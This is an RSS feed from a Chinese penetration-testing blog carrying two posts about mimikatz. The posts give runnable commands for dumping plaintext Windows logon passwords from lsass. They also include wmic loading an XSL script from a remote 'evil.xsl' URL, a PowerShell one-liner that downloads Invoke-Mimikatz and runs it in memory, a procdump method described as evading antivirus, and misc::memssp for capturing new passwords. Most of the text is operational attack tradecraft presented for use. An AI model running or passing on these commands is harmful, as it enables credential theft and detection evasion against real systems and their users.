<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>mimikatz &#8211; ChaBug安全</title>
	<atom:link href="/tags/mimikatz/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Fri, 23 Aug 2019 01:24:59 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>wmic与mimikatz技巧</title>
		<link>/web/427.html</link>
					<comments>/web/427.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 10 Jun 2018 12:59:01 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[mimikatz]]></category>
		<guid isPermaLink="false">/?p=359</guid>

					<description><![CDATA[前言 wmic是比cmd强大的命令行。轻量级调试器神器mimikatz，后渗透常用，可以说是您 居家旅行杀人灭口必备良器 测试wmic 使用wmic能够从本地或从URL调用XSL（...]]></description>
										<content:encoded><![CDATA[<h2>前言</h2>
<p><code>wmic</code>是比cmd强大的命令行。轻量级调试器神器<code><span class="wpcom_tag_link"><a href="/tags/mimikatz" title="mimikatz" target="_blank">mimikatz</a></span></code>，后渗透常用，可以说是您</p>
<blockquote><p>居家旅行杀人灭口必备良器<br />
<a href="https://camo.githubusercontent.com/25725cd2f17ea4aab3e5c3a1dfda390a14abd7df/687474703a2f2f696d6167652e75637a7a642e636e2f31313536363135303235363239373337303339392e6a7067" target="_blank" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/25725cd2f17ea4aab3e5c3a1dfda390a14abd7df/687474703a2f2f696d6167652e75637a7a642e636e2f31313536363135303235363239373337303339392e6a7067" alt="1" data-canonical-src="http://image.uczzd.cn/11566150256297370399.jpg" /></a></p></blockquote>
<h2>测试wmic</h2>
<p>使用wmic能够从本地或从URL调用XSL（可扩展样式表语言）脚本。</p>
<pre><code>本地：
wmic process list /FORMAT:evil.xsl
远程：
wmic os get /FORMAT:"https://example.com/evil.xsl"
</code></pre>
<ul>
<li><code>本地:</code></li>
</ul>
<p><a href="https://camo.githubusercontent.com/295fa5d494de68c02f1700d056b7fdd5d84634c5/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31332d35372d35332e706e67" target="_blank" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/295fa5d494de68c02f1700d056b7fdd5d84634c5/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31332d35372d35332e706e67" alt="2" data-canonical-src="http://p3s22758u.bkt.clouddn.com/Snipaste_2018-06-10_13-57-53.png" /></a></p>
<pre><code>privilege::debug
sekurlsa::logonpasswords
</code></pre>
<p><a href="https://camo.githubusercontent.com/0662f28764a3fd84fb893670a51b523cbad68402/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31332d35382d34332e706e67" target="_blank" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/0662f28764a3fd84fb893670a51b523cbad68402/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31332d35382d34332e706e67" alt="3" data-canonical-src="http://p3s22758u.bkt.clouddn.com/Snipaste_2018-06-10_13-58-43.png" /></a></p>
<p><code>密码账号</code></p>
<p><a href="https://camo.githubusercontent.com/7736ce944cff6acf26baa6b0bdea70c5f7a3f677/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31332d35392d32352e706e67" target="_blank" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/7736ce944cff6acf26baa6b0bdea70c5f7a3f677/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31332d35392d32352e706e67" alt="4" data-canonical-src="http://p3s22758u.bkt.clouddn.com/Snipaste_2018-06-10_13-59-25.png" /></a></p>
<ul>
<li><code>远程:</code></li>
</ul>
<p><a href="https://camo.githubusercontent.com/4515b2f2e63806e8ffb0675ac80b83a6299a3ec1/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31342d30352d35322e706e67" target="_blank" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/4515b2f2e63806e8ffb0675ac80b83a6299a3ec1/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31342d30352d35322e706e67" alt="5" data-canonical-src="http://p3s22758u.bkt.clouddn.com/Snipaste_2018-06-10_14-05-52.png" /></a></p>
<p>OK<br />
<a href="https://camo.githubusercontent.com/71f970368526b3eb0993fc25169b4cba434fd02c/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31342d30382d33382e706e67" target="_blank" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/71f970368526b3eb0993fc25169b4cba434fd02c/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31342d30382d33382e706e67" alt="6" data-canonical-src="http://p3s22758u.bkt.clouddn.com/Snipaste_2018-06-10_14-08-38.png" /></a></p>
<h2><code>PowerShell</code></h2>
<p>项目：<a href="https://github.com/caseysmithrc/XSLIdeas">地址</a></p>
<p>升级版<code>Demon表哥</code>演示<br />
<a href="https://camo.githubusercontent.com/0757fea9e8b2d411d3033a5f0c464b4cc58f9f3d/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31342d31342d31352e706e67" target="_blank" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/0757fea9e8b2d411d3033a5f0c464b4cc58f9f3d/687474703a2f2f7033733232373538752e626b742e636c6f7564646e2e636f6d2f536e6970617374655f323031382d30362d31305f31342d31342d31352e706e67" alt="7" data-canonical-src="http://p3s22758u.bkt.clouddn.com/Snipaste_2018-06-10_14-14-15.png" /></a></p>
<h2>总结</h2>
<p>emmmm，多关注墙外的知识。<br />
参考(抄袭)：<br />
<a href="https://www.secpulse.com/archives/71380.html" rel="nofollow">https://www.secpulse.com/archives/71380.html</a><br />
<a href="https://www.t00ls.net/viewthread.php?tid=45774&amp;extra=&amp;page=1" rel="nofollow">https://www.t00ls.net/viewthread.php?tid=45774&amp;extra=&amp;page=1</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/web/427.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>密码抓取之mimikatz的妙用</title>
		<link>/web/350.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 08 Feb 2018 20:03:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[mimikatz]]></category>
		<category><![CDATA[密码]]></category>
		<guid isPermaLink="false">/?p=139</guid>

					<description><![CDATA[简介 mimikatz是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于A...]]></description>
										<content:encoded><![CDATA[<h1>简介</h1>
<p><a href="https://github.com/gentilkiwi/mimikatz">mimikatz</a>是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录<span class="wpcom_tag_link"><a href="/tags/%e5%af%86%e7%a0%81" title="密码" target="_blank">密码</a></span>， lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略，通常我们在登陆系统时输入密码之后，密码便会储存在 lsass内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中， 而<span class="wpcom_tag_link"><a href="/tags/mimikatz" title="mimikatz" target="_blank">mimikatz</a></span>正是通过对lsass的逆算获取到明文密码！也就是说只要你不重启电脑，就可以通过他获取到登陆密码，只限当前登陆系统！</p>
<h1>基本命令</h1>
<pre><code>cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称--启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::logonPasswords--获登陆用户信息及密码</code></pre>
<h1>实战抓取</h1>
<p>只需要运行两条命令：</p>
<pre><code>privilege::debug
sekurlsa::logonpasswords</code></pre>
<p><img src="/wp-content/uploads/2018/02/271983201.jpg" alt="1517989449.jpg" title="1517989449.jpg"></p>
<p>我们也可以用powershell来抓取，仅需一条命令：</p>
<pre><code>powershell &quot;IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz&quot;</code></pre>
<p><img src="/wp-content/uploads/2018/02/3356049102.jpg" alt="1517989566.jpg" title="1517989566.jpg"></p>
<h1>进阶</h1>
<h3>绕过杀软抓取密码</h3>
<ol>
<li>procdump</li>
</ol>
<p>利用 procdump 导出 lsass.exe 在内存里的数据，之后 mimikatz 本地读取 操作系统版本要一致<br /><img src="/wp-content/uploads/2018/02/3621667987.jpg" alt="1.jpg" title="1.jpg"></p>
<pre><code>sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords</code></pre>
<ol>
<li>Invoke-Mimikatz</li>
</ol>
<p>内存中执行 不会在本地储存文件，前提是要支持 powershell</p>
<pre><code>powershell &quot;IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz&quot;</code></pre>
<h3>其他小技巧</h3>
<p>若管理员有每过几天就改密码的习惯，但是mimikatz抓取到的密码都是老密码</p>
<p>用QuarksPwDump等抓的hash也是老hash，新密码却抓不到的情况下</p>
<p>可以使用以下方法尝试解决</p>
<pre><code>privilege::debug
misc::memssp</code></pre>
<p>记录的结果在<code>c:\windows\system32\mimilsa.log</code><br />每次验证都会记录,如 锁屏 等  重启失效</p>
<p>出现如上问题是因为管理一直没注销过，都是直接断开连接，lsass进程里面还吃存放的老的。</p>
<p>也可以直接logoff，但是这样会很明显。</p>
<p>更多关于mimikatz妙用的文章：<br /><a href="https://www.webshell.cc/5343.html">Mimikatz 使用小技巧</a><br /><a href="https://www.cnblogs.com/hookjoy/p/5203193.html">如何防御“神器”Mimikatz窃取系统密码？</a><br /><a href="http://blog.gentilkiwi.com/mimikatz">Blog de Gentil Kiwi</a><br /><a href="https://exp10it.cn/index.php/archives/819/">密码抓取神器 mimikatz</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
